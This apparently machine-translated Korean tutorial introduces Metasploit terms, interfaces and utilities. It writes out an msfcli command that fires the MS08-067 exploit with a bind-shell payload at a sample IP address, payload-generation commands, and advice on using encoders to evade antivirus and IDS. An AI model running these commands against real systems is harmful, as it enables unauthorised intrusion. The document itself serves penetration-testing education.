2 - Metasploit 기초
4083 단어 안전 구멍
1. 전문 용어:
1. 침투 공격 Exploit: 공격 자 또는 침투 테스트 자가 하나의 시스템, 응용 또는 서비스 중의 안전 구멍 을 이용 하여 하 는 공격 행위.유행 하 는 침투 공격 기술 은 버퍼 넘 침, 웹 응용 프로그램의 구멍 공격 (SQL 주입), 설정 오류 등 을 포함한다.
2. 공격 부하 Payload: 목표 시스템 이 침투 공격 을 받 은 후에 실 행 될 코드 를 기대 합 니 다.MSF 프레임 에서 자 유 롭 게 선택, 전송, 간접 광 고 를 할 수 있다.
Eg:
3. Shellcode: 공격 부하 로 실행 되 는 기계 명령 입 니 다.대상 시스템 이 셸 코드 를 실행 한 후에 야 명령 행 이나 Meterpreter 셸 을 제공 할 수 있 습 니 다.
4. 모듈 모듈 모듈: MSF 프레임 워 크 에서 사용 하 는 소프트웨어 코드 구성 요소 입 니 다.침투 공격 모듈 exploit module – 실제 침투 공격 을 하 는 소프트웨어 구성 요소.보조 모듈 auxiliary module – 주입 스 캔 이나 시스템 검사 점 의 공격 동작 을 수행 합 니 다.
5. 모니터 Listener: 네트워크 연결 을 기다 리 는 구성 요소 입 니 다.
2. Metasploit 사용자 인터페이스 단말기, 명령 행 과 그래 픽 인터페이스
1. MSF 터미널 – msfconsole 는 Metasploit 프레임 워 크 의 거의 모든 옵션 과 설정 에 접근 할 수 있 습 니 다.
MSF 터미널 시작 – 명령 행 에 msfconsole 접근 도움말 파일 입력 – help + metasploit 명령
2. MSF 명령 행 – msfcli 는 스 크 립 트 처리 와 다른 명령 행 도구 의 상호 작용 성 을 고려 합 니 다.
침투 공격 모듈 과 필요 한 설정 파 라 메 터 를 사용 하 는 지 명 확 히 알 고 있 을 때 침투 공격 을 효과적으로 실시 하 는 절묘 한 도구 가 될 것 입 니 다.
기본 도움말 문 서 를 표시 하려 면 다음 명령 을 사용 하 십시오.
msfcli -h
msfcli <exploit_name> <option=value> [mode]
인 스 턴 스 사용:
(1) 입력 한 문자열 명령 뒤에 'O' 문 자 를 추가 하여 이 모듈 이 제공 하 는 설정 파 라미 터 를 보십시오.
ms 08 보기067_netapi 모듈 의 설정 매개 변수
msfcli windows/smb/ms08_067_netapi O
(2), "P"문 자 를 추가 하여 사용 가능 한 공격 하중 을 검사 합 니 다.
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
(3) 필요 한 모든 설정 옵션 을 설정 하고 공격 하중 을 선택 한 후 msfcli 명령 매개 변수 문자열 을 통 해 마지막 으로 문자 'E' 를 추가 하여 침투 테스트 코드 를 실행 합 니 다.
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
3. Armitage – 그래 픽 사용자 인터페이스 ~? 현재 msfgui ~ ~ ~
3. Metasploit 기능 프로그램 은 특정한 상황 에서 Metasploit 프레임 워 크 의 일부 특수 기능 에 직접 접근 하 는 인터페이스 입 니 다.
1. MSF 공격 하중 생 성기
셸 코드 생 성, 실행 가능 코드 및 기타 더 많은 것 을 허용 합 니 다. 셸 코드 는 C, 자바 스 크 립 트, 심지어 웹 프로그램 에서 VB 스 크 립 트 등 다양한 형식 을 생 성 할 수 있 으 며, 모든 출력 형식 은 필드 에서 사용 하지 않 습 니 다.
//查看msfpayload需要哪些配置选项
msfpayload -h
//查看攻击载荷模块的配置选项
msfpayload windows/shell_reverse_tcp O
2. MSF 인 코더
MSF 공격 부하 생 성기 에서 발생 하 는 셸 코드 는 완전히 실행 가능 하지만, 일부 null 빈 문자 가 포함 되 어 있 으 며, 프로그램 분석 시 문자열 의 끝 으로 여 겨 져 코드 의 전체 실행 을 중지 합 니 다.
\0x 00 과\0xff 문 자 는 공격 하중 을 파괴 합 니 다.
MSF 인 코더 - 원본 payload 를 인 코딩 하여 나 쁜 문 자 를 피하 고 백신 소프트웨어 와 IDS 검 사 를 피한다.
//查看MSF编码器的配置选项列表
msfencode -h
MSF 에는 다양한 장면 에 사용 할 수 있 는 인 코더 가 포함 되 어 있 습 니 다. Excellent 등급 의 인 코더 – x86/shikata ga nai 인 코더
//查看有哪些可用的编码器清单,并以可靠性的好坏进行排序显示
msfencode -1
3、Nasm Shell
nasm shell. rb 기능 프로그램 – 어 셈 블 리 코드 의 미 를 파악 하고 주어진 어 셈 블 리 명령 에 대해 opcode 작업 코드 를 찾 습 니 다.
//运行工具,请求jmp esp命令的opcode操作码
root@bt:./nasm_shell.rb
nasm> jmp esp
//结果如下
00000000 FFE4 jmp esp
4. Metasploit Express 와 Metasploit Pro 상업 화 웹 인터페이스 소프트웨어.